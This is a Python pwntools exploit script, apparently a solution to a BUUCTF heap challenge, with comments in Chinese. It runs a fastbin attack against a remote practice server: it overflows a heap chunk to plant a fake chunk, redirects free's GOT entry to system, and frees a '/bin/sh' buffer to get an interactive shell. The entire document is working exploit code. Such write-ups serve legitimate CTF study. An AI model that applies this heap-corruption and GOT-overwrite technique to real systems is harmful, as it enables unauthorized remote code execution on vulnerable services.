1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
context.terminal=["tmux","splitw","-h"]
#io=process("./pwn")
elf=ELF("./pwn")
io=remote("node5.buuoj.cn",25734)
#gdb.attach(io)
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
ia = lambda :io.interactive()
get_64 = lambda :u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
get_32 = lambda :u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
def add(size,content):
sla("Your choice :",'1')
sla("Size of Heap : ",str(size))
sla("Content of heap:",content)
def edit(idx,size,content):
sla("Your choice :",'2')
sla("Index :",str(idx))
sla("Size of Heap : ",str(size))
sla("Content of heap : ",content)
def free(idx):
sla("Your choice :",'3')
sla("Index :",str(idx))
add(0x60,'aaaa') #0
add(0x60,'aaaa') #1
add(0x60,'aaaa') #2
free(2) #释放到fastbins后打fastbin attack
payload=b'/bin/sh\x00'+cyclic(0x60)+p64(0x71)+p64(0x6020ad)
edit(1,len(payload),payload) #f写入/bin/sh+填充+fake chunk地址和大小
add(0x60,'aaaa') #重新申请回chunk2
add(0x60,'aaaa') #chunk2->fake chunk
payload=cyclic(0x23)+p64(elf.got['free'])
edit(3,len(payload),payload) #写入freegot
payload3=p64(elf.plt['system'])
edit(0,len(payload3),payload3) #将freegot修改到system
free(1)
io.interactive()
|